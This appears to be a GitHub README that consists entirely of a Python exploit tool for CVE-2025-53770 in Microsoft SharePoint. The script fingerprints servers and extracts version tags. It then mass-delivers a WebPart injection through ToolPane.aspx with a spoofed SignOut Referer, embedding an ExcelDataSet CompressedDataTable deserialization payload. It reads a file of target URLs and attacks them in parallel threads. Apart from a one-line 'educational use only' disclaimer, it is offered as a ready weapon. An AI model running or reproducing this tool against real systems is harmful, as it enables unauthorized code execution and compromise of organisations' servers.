README.md
Rendering markdown...
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Ultimate SharePoint Exploit Tool
Combines Detection + Version Check + WebPart Injection (CVE-2025-53770)
Author: @GOTOCVE — https://t.me/GOTOCVE
Version: 3.1
Educational use only — Unauthorized use is prohibited.
"""
import argparse
import concurrent.futures
import requests
import urllib.parse
import re
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from termcolor import cprint
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
retry_strategy = Retry(
total=3,
backoff_factor=1,
status_forcelist=[429, 500, 502, 503, 504],
allowed_methods=["HEAD", "GET", "OPTIONS", "POST"]
)
adapter = HTTPAdapter(max_retries=retry_strategy)
def create_session():
session = requests.Session()
session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; Python Exploit Tool)'
})
session.verify = False
session.mount("https://", adapter)
session.mount("http://", adapter)
return session
def normalize_url(url: str) -> str:
return url if url.startswith(('http://', 'https://')) else "https://" + url
def detect_sharepoint(session: requests.Session, url: str) -> dict:
try:
r = session.get(url, timeout=7)
content = r.text
headers = r.headers
indicators = any(s in content for s in ['_layouts', '_vti_bin', 'sp-page-content', 'SharePoint'])
sp_headers = any(headers.get(k) for k in ['MicrosoftSharePointTeamServices', 'X-SharePointHealthScore', 'SPRequestGuid'])
return {
'url': url,
'is_sharepoint': indicators or sp_headers,
'version': headers.get('MicrosoftSharePointTeamServices', 'Unknown'),
'status_code': r.status_code
}
except requests.RequestException as e:
cprint(f"[!] Request failed for {url}: {e}", "red")
return {'url': url, 'is_sharepoint': False, 'version': 'Unknown', 'error': str(e)}
def extract_site_client_tag(session: requests.Session, url: str) -> str | None:
try:
r = session.get(urllib.parse.urljoin(url, '/_layouts/15/error.aspx'), timeout=7)
match = re.search(r'"siteClientTag"\s*:\s*"\d*\\\\\\$+([^\"]+)",?', r.text)
return match.group(1) if match else None
except requests.RequestException:
return None
def build_dwp_payload(compressed_data: str) -> str:
return f'''
<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, PublicKeyToken=31bf3856ad364e35" %>
<asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest">
<ProgressTemplate>
<div class="divWaiting">
<Scorecard:ExcelDataSet CompressedDataTable="{compressed_data}" DataTable-CaseSensitive="false" runat="server" />
</div>
</ProgressTemplate>
</asp:UpdateProgress>'''.strip()
def exploit(session: requests.Session, url: str, compressed_data: str) -> None:
target_url = urllib.parse.urljoin(url, "/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx")
headers = {
"Content-Type": "application/x-www-form-urlencoded",
"Referer": urllib.parse.urljoin(url, "/_layouts/SignOut.aspx")
}
post_data = {"MSOTlPn_DWP": build_dwp_payload(compressed_data)}
try:
r = session.post(target_url, headers=headers, data=urllib.parse.urlencode(post_data), timeout=15)
if r.status_code == 200:
cprint(f"[+] Exploit delivered to {url}", "green")
else:
cprint(f"[-] Unexpected status code {r.status_code} from {url}", "yellow")
except requests.RequestException as e:
cprint(f"[!] Exploit failed for {url}: {e}", "red")
def process_target(url: str, payload_b64: str) -> None:
session = create_session()
normalized_url = normalize_url(url)
info = detect_sharepoint(session, normalized_url)
if not info.get('is_sharepoint'):
cprint(f"[-] Not a SharePoint site: {normalized_url}", "yellow")
return
version = extract_site_client_tag(session, normalized_url) or info.get('version', 'Unknown')
cprint(f"[i] SharePoint version at {normalized_url}: {version}", "blue")
exploit(session, normalized_url, payload_b64)
def main():
parser = argparse.ArgumentParser(description="Ultimate SharePoint Exploit Tool v3.0 — by @GOTOCVE")
parser.add_argument("-f", "--file", required=True, help="File with target URLs (one per line)")
parser.add_argument("-p", "--payload", required=True, help="Base64-encoded CompressedDataTable payload")
parser.add_argument("-t", "--threads", type=int, default=10, help="Number of concurrent threads")
args = parser.parse_args()
try:
with open(args.file, 'r') as f:
targets = [line.strip() for line in f if line.strip()]
except Exception as e:
cprint(f"[!] Failed to read targets: {e}", "red")
return
cprint(f"[*] Loaded {len(targets)} targets. Starting scan with {args.threads} threads...", "blue")
start = time.time()
with concurrent.futures.ThreadPoolExecutor(max_workers=args.threads) as executor:
futures = [executor.submit(process_target, url, args.payload) for url in targets]
for future in concurrent.futures.as_completed(futures):
try:
future.result()
except Exception as e:
cprint(f"[!] Thread error: {e}", "red")
cprint(f"[*] Scan completed in {time.time() - start:.2f} seconds.", "blue")
if __name__ == "__main__":
main()